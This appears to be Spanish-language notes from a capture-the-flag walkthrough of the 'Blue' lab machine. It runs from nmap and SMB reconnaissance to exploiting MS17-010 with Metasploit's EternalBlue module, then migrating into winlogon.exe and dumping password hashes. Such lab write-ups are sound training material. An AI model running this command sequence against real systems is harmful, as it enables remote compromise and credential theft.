# Blue

## Reconocimiento

```
export IP=<ip-blue>
ping -c3 <ip>

mkdir -p CTF/Blue

cd CTF/Blue

mkdir recon content exploit

cd recon
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn $IP -oG puertos

# cat puertos | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',' | xclip

sudo nmap -p135,139,445,3389,49152,49153,49154,49158,49160 -sV -sC -n -vvv $IP -oN blue.nmap

```

### Recon windows

```
crackmapexec smb $IP
```

## Búsqueda de vulnerabilidades

```
nmap -p445 -n -vvv --script vuln $IP  -oN blue.vulns
```

## Explotación

Buscar exploits con el comando:

```
searchsploit ms17-010
```

Encontramos el exploit Eternalblue, disponible para metasploit

```
sudo msfdb init
msfconsole -q
```
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <ip-blue>
set LHOST <ip-kali>
exploit
```
`sysinfo`
`ps`
migrate -N winlogon.exe
hashdumpd
```
